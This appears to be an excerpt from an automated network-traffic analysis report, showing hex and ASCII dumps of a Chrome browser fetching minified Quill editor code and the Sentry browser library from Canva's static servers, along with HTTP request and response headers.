                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 7d 2c 6e 2e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 31 26 65 26 26 28 74 3d 6e 28 74 29 29 2c 38 26 65 29 72 65 74 75 72 6e 20 74 3b 69 66 28 34 26 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 29 72 65 74 75 72 6e 20 74 3b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 3b 69 66 28 6e 2e 72 28 72 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 64 65 66 61 75 6c 74 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 74 7d 29 2c 32 26 65 26 26 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 29 66 6f 72 28 76 61 72 20 6f 20
                                                                                                                                                                                                                                                    Data Ascii: __esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var o
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 72 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 69 2e 70 75 73 68 28 72 2e 76 61 6c 75 65 29 2c 21 65 7c 7c 69 2e 6c 65 6e 67 74 68 21 3d 3d 65 29 3b 73 3d 21 30 29 3b 7d 63 61 74 63 68 28 75 29 7b 61 3d 21 30 2c 6f 3d 75 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 73 7c 7c 6e 75 6c 6c 3d 3d 6e 2e 72 65 74 75 72 6e 7c 7c 6e 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 61 29 74 68 72 6f 77 20 6f 7d 7d 72 65 74 75 72 6e 20 69 7d 7d 28 74 2c 65 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 72 65 74 75 72 6e 20 77 28 74 2c 65 29 3b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 74 29
                                                                                                                                                                                                                                                    Data Ascii: r=n.next()).done)&&(i.push(r.value),!e||i.length!==e);s=!0);}catch(u){a=!0,o=u}finally{try{s||null==n.return||n.return()}finally{if(a)throw o}}return i}}(t,e)||function(t,e){if(t){if("string"==typeof t)return w(t,e);var n=Object.prototype.toString.call(t)
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 69 6e 6e 65 72 48 54 4d 4c 2e 74 72 69 6d 28 29 3b 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 71 6c 2d 63 6f 6e 74 61 69 6e 65 72 22 29 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 22 2c 64 2e 61 2e 73 65 74 28 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2c 74 68 69 73 29 2c 74 68 69 73 2e 72 6f 6f 74 3d 74 68 69 73 2e 61 64 64 43 6f 6e 74 61 69 6e 65 72 28 22 71 6c 2d 65 64 69 74 6f 72 22 29 2c 74 68 69 73 2e 72 6f 6f 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 71 6c 2d 62 6c 61 6e 6b 22 29 2c 74 68 69 73 2e 73 63 72 6f 6c 6c 69 6e 67 43 6f 6e 74 61 69 6e 65 72 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 63 72 6f 6c 6c 69 6e 67 43 6f 6e 74 61 69 6e 65 72 7c 7c 74 68
                                                                                                                                                                                                                                                    Data Ascii: innerHTML.trim();this.container.classList.add("ql-container"),this.container.innerHTML="",d.a.set(this.container,this),this.root=this.addContainer("ql-editor"),this.root.classList.add("ql-blank"),this.scrollingContainer=this.options.scrollingContainer||th
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 2e 72 6f 6f 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 70 6c 61 63 65 68 6f 6c 64 65 72 22 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 6c 61 63 65 68 6f 6c 64 65 72 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 61 64 4f 6e 6c 79 26 26 74 68 69 73 2e 64 69 73 61 62 6c 65 28 29 2c 74 68 69 73 2e 61 6c 6c 6f 77 52 65 61 64 4f 6e 6c 79 45 64 69 74 73 3d 21 31 7d 76 61 72 20 65 2c 6e 2c 72 3b 72 65 74 75 72 6e 20 65 3d 74 2c 6e 3d 5b 7b 6b 65 79 3a 22 61 64 64 43 6f 6e 74 61 69 6e 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 6e 75 6c
                                                                                                                                                                                                                                                    Data Ascii: .root.setAttribute("data-placeholder",this.options.placeholder),this.options.readOnly&&this.disable(),this.allowReadOnlyEdits=!1}var e,n,r;return e=t,n=[{key:"addContainer",value:function(t){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:nul
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 67 74 68 2c 6d 28 7b 7d 2c 74 2c 65 29 29 3b 65 6c 73 65 7b 69 66 28 30 3d 3d 3d 72 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 6e 2e 73 65 6c 65 63 74 69 6f 6e 2e 66 6f 72 6d 61 74 28 74 2c 65 29 2c 69 3b 69 3d 6e 2e 65 64 69 74 6f 72 2e 66 6f 72 6d 61 74 54 65 78 74 28 72 2e 69 6e 64 65 78 2c 72 2e 6c 65 6e 67 74 68 2c 6d 28 7b 7d 2c 74 2c 65 29 29 7d 72 65 74 75 72 6e 20 6e 2e 73 65 74 53 65 6c 65 63 74 69 6f 6e 28 72 2c 66 2e 61 2e 73 6f 75 72 63 65 73 2e 53 49 4c 45 4e 54 29 2c 69 7d 29 2c 72 29 7d 7d 2c 7b 6b 65 79 3a 22 66 6f 72 6d 61 74 4c 69 6e 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 69 2c 73 3d 74 68 69 73 2c 61 3d 67 28 54 28 74 2c 65 2c 6e 2c 72 2c 6f 29 2c 34 29 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                    Data Ascii: gth,m({},t,e));else{if(0===r.length)return n.selection.format(t,e),i;i=n.editor.formatText(r.index,r.length,m({},t,e))}return n.setSelection(r,f.a.sources.SILENT),i}),r)}},{key:"formatLine",value:function(t,e,n,r,o){var i,s=this,a=g(T(t,e,n,r,o),4);return
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 6d 61 74 28 74 2c 65 29 3a 74 68 69 73 2e 65 64 69 74 6f 72 2e 67 65 74 46 6f 72 6d 61 74 28 74 2e 69 6e 64 65 78 2c 74 2e 6c 65 6e 67 74 68 29 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 49 6e 64 65 78 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 6f 66 66 73 65 74 28 74 68 69 73 2e 73 63 72 6f 6c 6c 29 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 4c 65 6e 67 74 68 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 63 72 6f 6c 6c 2e 6c 65 6e 67 74 68 28 29 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 4c 65 61 66 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 63 72 6f 6c 6c 2e 6c 65 61 66 28 74 29 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 4c 69 6e 65
                                                                                                                                                                                                                                                    Data Ascii: mat(t,e):this.editor.getFormat(t.index,t.length)}},{key:"getIndex",value:function(t){return t.offset(this.scroll)}},{key:"getLength",value:function(){return this.scroll.length()}},{key:"getLeaf",value:function(t){return this.scroll.leaf(t)}},{key:"getLine
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 61 72 20 6f 3d 74 68 69 73 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 33 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 33 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 33 5d 3a 74 2e 73 6f 75 72 63 65 73 2e 41 50 49 3b 72 65 74 75 72 6e 20 53 2e 63 61 6c 6c 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 65 64 69 74 6f 72 2e 69 6e 73 65 72 74 45 6d 62 65 64 28 65 2c 6e 2c 72 29 7d 29 2c 69 2c 65 29 7d 7d 2c 7b 6b 65 79 3a 22 69 6e 73 65 72 74 54 65 78 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 69 2c 73 3d 74 68 69 73 2c 61 3d 67 28 54 28 74 2c 30 2c 6e 2c 72 2c 6f 29 2c 34 29 3b 72 65 74 75 72 6e 20 74 3d 61 5b 30 5d 2c 69 3d 61 5b 32 5d 2c 6f
                                                                                                                                                                                                                                                    Data Ascii: ar o=this,i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:t.sources.API;return S.call(this,(function(){return o.editor.insertEmbed(e,n,r)}),i,e)}},{key:"insertText",value:function(t,e,n,r,o){var i,s=this,a=g(T(t,0,n,r,o),4);return t=a[0],i=a[2],o
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 33 5d 2c 74 68 69 73 2e 73 65 6c 65 63 74 69 6f 6e 2e 73 65 74 52 61 6e 67 65 28 6e 65 77 20 70 2e 61 28 4d 61 74 68 2e 6d 61 78 28 30 2c 65 29 2c 6e 29 2c 72 29 2c 72 21 3d 3d 66 2e 61 2e 73 6f 75 72 63 65 73 2e 53 49 4c 45 4e 54 26 26 74 68 69 73 2e 73 65 6c 65 63 74 69 6f 6e 2e 73 63 72 6f 6c 6c 49 6e 74 6f 56 69 65 77 28 74 68 69 73 2e 73 63 72 6f 6c 6c 69 6e 67 43 6f 6e 74 61 69 6e 65 72 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 73 65 74 54 65 78 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 66 2e 61 2e 73 6f 75 72 63 65 73 2e 41 50 49 2c 6e 3d 28 6e 65 77 20 6f
                                                                                                                                                                                                                                                    Data Ascii: 3],this.selection.setRange(new p.a(Math.max(0,e),n),r),r!==f.a.sources.SILENT&&this.selection.scrollIntoView(this.scrollingContainer)}}},{key:"setText",value:function(t){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:f.a.sources.API,n=(new o


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    7192.168.2.449749104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC795OUTGET /static/lib/sentry/7.16.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1357INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:21 GMT
                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a79e87f8a0f65-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Age: 1870437
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: W/"91258797204803263e4c46f8400f1bda"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:07 GMT
                                                                                                                                                                                                                                                    Last-Modified: Mon, 14 Oct 2024 22:43:15 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: n/tgAv7nhdMK8+ZDRGJEaCxpKxVhLFJZMQK/5RvJNADTgttBr37iBiAAR/bcmMUlTegrHaZW7D4=
                                                                                                                                                                                                                                                    x-amz-meta-vary: Origin
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: 4BC7Q2FFFT5VZFJY
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: tozEOUZEBcqjRpGz85aK0Lg42bZme1w8
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FuJQOG%2FSmtYEsQCvQZPmzoXcHZppCI1m4b8aTegQ%2FRD8zgv4704M%2FghZM0YcA9PMvKMSs0JmB6tq3l8RifFpSuLlVclr1GMX51ZBAAgz8l%2FnKbVUET9C4PE9xuTQr%2BD8Tcg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC92INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 37 66 66 61 0d 0a 2f 2a 21 20 40 73 65 6e 74 72 79 2f 62 72 6f 77 73 65 72 20 37 2e 31 36 2e 30 20 28 35 33 38 36 63 65 37 29 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 65 74 73 65 6e 74 72 79 2f 73 65 6e 74 72 79 2d 6a 61 76 61 73 63 72 69 70 74 20 2a 2f 0a 76 61 72 20 53 65 6e 74 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6f 6e 73 74 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 73 77 69 74 63 68 28 6e 2e 63 61 6c 6c 28 74 29 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 45 72 72 6f 72 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 45 78 63 65 70 74 69 6f 6e 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 44 4f 4d 45 78 63 65 70 74 69 6f 6e
                                                                                                                                                                                                                                                    Data Ascii: 7ffa/*! @sentry/browser 7.16.0 (5386ce7) | https://github.com/getsentry/sentry-javascript */var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 2c 73 2c 63 2c 75 2c 61 3b 69 66 28 21 65 7c 7c 21 65 2e 74 61 67 4e 61 6d 65 29 72 65 74 75 72 6e 22 22 3b 72 2e 70 75 73 68 28 65 2e 74 61 67 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 63 6f 6e 73 74 20 66 3d 6e 26 26 6e 2e 6c 65 6e 67 74 68 3f 6e 2e 66 69 6c 74 65 72 28 28 74 3d 3e 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 29 29 2e 6d 61 70 28 28 74 3d 3e 5b 74 2c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 5d 29 29 3a 6e 75 6c 6c 3b 69 66 28 66 26 26 66 2e 6c 65 6e 67 74 68 29 66 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 72 2e 70 75 73 68 28 60 5b 24 7b 74 5b 30 5d 7d 3d 22 24 7b 74 5b 31 5d 7d 22 5d 60 29 7d 29 29 3b 65 6c 73 65 20 69 66 28 65 2e 69 64 26 26 72 2e 70 75 73 68 28 60 23 24 7b 65 2e 69 64 7d 60 29 2c 69
                                                                                                                                                                                                                                                    Data Ascii: ,s,c,u,a;if(!e||!e.tagName)return"";r.push(e.tagName.toLowerCase());const f=n&&n.length?n.filter((t=>e.getAttribute(t))).map((t=>[t,e.getAttribute(t)])):null;if(f&&f.length)f.forEach((t=>{r.push(`[${t[0]}="${t[1]}"]`)}));else if(e.id&&r.push(`#${e.id}`),i
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 6f 2c 70 72 6f 74 6f 63 6f 6c 3a 65 2c 70 75 62 6c 69 63 4b 65 79 3a 72 7d 29 7d 28 74 29 3a 77 28 74 29 7d 63 6f 6e 73 74 20 53 3d 5b 22 64 65 62 75 67 22 2c 22 69 6e 66 6f 22 2c 22 77 61 72 6e 22 2c 22 65 72 72 6f 72 22 2c 22 6c 6f 67 22 2c 22 61 73 73 65 72 74 22 2c 22 74 72 61 63 65 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 24 28 74 2c 6e 3d 30 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 30 3d 3d 3d 6e 7c 7c 74 2e 6c 65 6e 67 74 68 3c 3d 6e 3f 74 3a 60 24 7b 74 2e 73 75 62 73 74 72 28 30 2c 6e 29 7d 2e 2e 2e 60 7d 66 75 6e 63 74 69 6f 6e 20 78 28 74 2c 6e 29 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 72 65 74 75 72 6e 22 22 3b 63 6f 6e 73 74 20 65 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 6e 3d 30 3b
                                                                                                                                                                                                                                                    Data Ascii: o,protocol:e,publicKey:r})}(t):w(t)}const S=["debug","info","warn","error","log","assert","trace"];function $(t,n=0){return"string"!=typeof t||0===n||t.length<=n?t:`${t.substr(0,n)}...`}function x(t,n){if(!Array.isArray(t))return"";const e=[];for(let n=0;
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 6f 6e 73 74 20 65 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 52 28 74 29 29 3b 69 66 28 65 2e 73 6f 72 74 28 29 2c 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 68 61 73 20 6e 6f 20 6b 65 79 73 5d 22 3b 69 66 28 65 5b 30 5d 2e 6c 65 6e 67 74 68 3e 3d 6e 29 72 65 74 75 72 6e 20 24 28 65 5b 30 5d 2c 6e 29 3b 66 6f 72 28 6c 65 74 20 74 3d 65 2e 6c 65 6e 67 74 68 3b 74 3e 30 3b 74 2d 2d 29 7b 63 6f 6e 73 74 20 72 3d 65 2e 73 6c 69 63 65 28 30 2c 74 29 2e 6a 6f 69 6e 28 22 2c 20 22 29 3b 69 66 28 21 28 72 2e 6c 65 6e 67 74 68 3e 6e 29 29 72 65 74 75 72 6e 20 74 3d 3d 3d 65 2e 6c 65 6e 67 74 68 3f 72 3a 24 28 72 2c 6e 29 7d 72 65 74 75 72 6e 22 22 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 74 29 7b 72 65 74 75 72 6e 20 41 28 74 2c 6e 65 77 20
                                                                                                                                                                                                                                                    Data Ascii: onst e=Object.keys(R(t));if(e.sort(),!e.length)return"[object has no keys]";if(e[0].length>=n)return $(e[0],n);for(let t=e.length;t>0;t--){const r=e.slice(0,t).join(", ");if(!(r.length>n))return t===e.length?r:$(r,n)}return""}function N(t){return A(t,new
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 75 72 6e 20 6e 65 77 20 48 65 61 64 65 72 73 2c 6e 65 77 20 52 65 71 75 65 73 74 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 29 2c 6e 65 77 20 52 65 73 70 6f 6e 73 65 2c 21 30 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 2f 5e 66 75 6e 63 74 69 6f 6e 20 66 65 74 63 68 5c 28 5c 29 5c 73 2b 5c 7b 5c 73 2b 5c 5b 6e 61 74 69 76 65 20 63 6f 64 65 5c 5d 5c 73 2b 5c 7d 24 2f 2e 74 65 73 74 28 74 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 63 6f 6e 73 74 20 46 3d 7b 7d 2c 42 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 58 28 74 29 7b 69 66 28 21 42 5b 74 5d 29 73 77 69 74 63 68 28 42 5b 74 5d 3d 21 30 2c 74 29 7b 63 61 73 65 22 63 6f 6e 73 6f 6c 65 22 3a 21
                                                                                                                                                                                                                                                    Data Ascii: urn new Headers,new Request("http://www.example.com"),new Response,!0}catch(t){return!1}}function H(t){return t&&/^function fetch\(\)\s+\{\s+\[native code\]\s+\}$/.test(t.toString())}const F={},B={};function X(t){if(!B[t])switch(B[t]=!0,t){case"console":!
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 74 72 79 5f 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 5f 68 61 6e 64 6c 65 72 73 5f 5f 29 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 2c 65 2c 72 29 7d 7d 29 29 29 7d 29 29 7d 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 78 68 72 22 3a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 28 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 69 6e 20 79 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 74 3d 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2e 70 72 6f 74 6f 74 79 70 65 3b 6b 28 74 2c 22 6f 70 65 6e 22 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 2e 2e 2e 6e 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2c 72 3d 6e 5b 31 5d 2c 69 3d 65 2e 5f 5f 73 65 6e 74 72 79 5f 78 68
                                                                                                                                                                                                                                                    Data Ascii: try_instrumentation_handlers__)}catch(t){}return t.call(this,n,e,r)}})))}))}();break;case"xhr":!function(){if(!("XMLHttpRequest"in y))return;const t=XMLHttpRequest.prototype;k(t,"open",(function(t){return function(...n){const e=this,r=n[1],i=e.__sentry_xh
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 44 61 74 61 3a 7b 6d 65 74 68 6f 64 3a 4a 28 6e 29 2c 75 72 6c 3a 4b 28 6e 29 7d 2c 73 74 61 72 74 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 3b 72 65 74 75 72 6e 20 57 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 7d 29 2c 74 2e 61 70 70 6c 79 28 79 2c 6e 29 2e 74 68 65 6e 28 28 74 3d 3e 28 57 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 2c 65 6e 64 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 72 65 73 70 6f 6e 73 65 3a 74 7d 29 2c 74 29 29 2c 28 74 3d 3e 7b 74 68 72 6f 77 20 57 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 2c 65 6e 64 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 65 72 72 6f 72 3a 74 7d 29 2c 74 7d 29 29 7d 7d 29 29 7d 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 68 69 73 74 6f 72 79 22 3a 21 66
                                                                                                                                                                                                                                                    Data Ascii: Data:{method:J(n),url:K(n)},startTimestamp:Date.now()};return W("fetch",{...e}),t.apply(y,n).then((t=>(W("fetch",{...e,endTimestamp:Date.now(),response:t}),t)),(t=>{throw W("fetch",{...e,endTimestamp:Date.now(),error:t}),t}))}}))}();break;case"history":!f
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 47 45 54 22 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 74 3d 5b 5d 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 5b 30 5d 3f 74 5b 30 5d 3a 22 52 65 71 75 65 73 74 22 69 6e 20 79 26 26 68 28 74 5b 30 5d 2c 52 65 71 75 65 73 74 29 3f 74 5b 30 5d 2e 75 72 6c 3a 53 74 72 69 6e 67 28 74 5b 30 5d 29 7d 6c 65 74 20 47 3b 6c 65 74 20 56 2c 51 3b 66 75 6e 63 74 69 6f 6e 20 59 28 74 2c 6e 3d 21 31 29 7b 72 65 74 75 72 6e 20 65 3d 3e 7b 69 66 28 21 65 7c 7c 51 3d 3d 3d 65 29 72 65 74 75 72 6e 3b 69 66 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 6b 65 79 70 72 65 73 73 22 21 3d 3d 74 2e 74 79 70 65 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 63 6f 6e 73 74 20 6e 3d 74 2e 74 61 72 67 65 74 3b 69 66 28 21 6e 7c 7c 21 6e 2e 74 61 67 4e 61
